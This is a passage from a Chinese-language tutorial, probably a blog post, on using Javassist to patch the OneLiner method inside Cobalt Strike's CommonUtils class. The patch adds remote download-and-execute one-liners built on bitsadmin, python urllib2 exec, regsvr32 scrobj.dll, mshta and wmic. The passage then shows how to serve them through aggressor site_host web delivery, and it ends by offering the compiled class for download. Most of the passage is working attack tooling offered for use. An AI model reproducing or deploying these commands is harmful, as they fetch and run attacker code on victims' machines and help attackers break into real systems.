                    cPool.insertClassPath("/tmp/cobaltstrike.jar");
                    
                    //获取该要修改的class对象
                    CtClass cClass = cPool.get("common.CommonUtils");
                    
                    //获取到对应的方法
                    CtMethod cMethod = cClass.getDeclaredMethod("OneLiner");
                    
                    //更改该方法的内部实现
                    //需要注意的是对于参数的引用要以$开始,不能直接输入参数名称
                    cMethod.setBody("{ if (\"bitsadmin\".equals($2)) {"
                            + "String f = garbage(\"temp\");"
                            + "return \"cmd.exe /c bitsadmin /transfer \" + f + \" \" + $1 + \" %APPDATA%\\\\\" + f + \".exe&%APPDATA%\\\\\" + f + \".exe&del %APPDATA%\\\\\" + f + \".exe\";}"
                            + "if (\"powershell\".equals($2)) {"
                            + "return PowerShellOneLiner($1);}"
                            + "if (\"python\".equals($2)) {"
                            + "return \"python -c \\\"import urllib2; exec urllib2.urlopen('\" + $1 + \"').read();\\\"\";}"
                            + "if (\"regsvr32\".equals($2)) {"
                            + "return \"regsvr32 /s /n /u /i:\" + $1 + \" scrobj.dll\";}"
                            + "if (\"mshta\".equals($2)) {"
                            + "return \"mshta \" + $1;}"
                            + "if (\"wmic\".equals($2)) {"
                            + "  return \"wmic os get /format:\\\"\" + $1 + \"\\\"\";}"
                            + "print_error(\"'\" + $2 + \"' for URL '\" + $1 + \"' does not have a one-liner\");"
                            + "throw new RuntimeException(\"'\" + $2 + \"' for URL '\" + $1 + \"' does not have a one-liner\");}");
                    
                    //修改以后输出目录
                    cClass.writeFile("/tmp/");
                    
                    System.out.println("=======修改方法完=========");
                } catch (NotFoundException e) {
                    e.printStackTrace();
                } catch (CannotCompileException e) {
                    e.printStackTrace();
                } catch (IOException e) {
                    e.printStackTrace();
                }
            }
    
    }
    

    在这里要注意的是,方法 OneLiner(String url, String type)有两个参数,方法中的参数从 $1 开始,若该方法为非 static 方法,可以用 $0 来表示该方法实例自身,若该方法为 static 方法,则 $0 不可用。而且写的代码需要将", \ 进行转义。

    运行此代码,可成功生成一个新的class:
    39332-5o637aqvh1.png

    41077-02rq3jqomynr.png

    将此class替换CS中的class就好了。

    使用的时候只需要在aggressor中site_host中指定即可,例如使用wmic

    site_host(%options["host"], %options["port"], %options["uri"], $data, "text/plain", "Scripted Web Delivery (wmic)"); 
    

    使用mshta

    site_host(%options["host"], %options["port"], %options["htauri"], $htadata, "application/hta", "Scripted Web Delivery (mshta)");
    

    效果如下:
    aaa

    已经编译好的class可以从这里下载:
    GITHUB: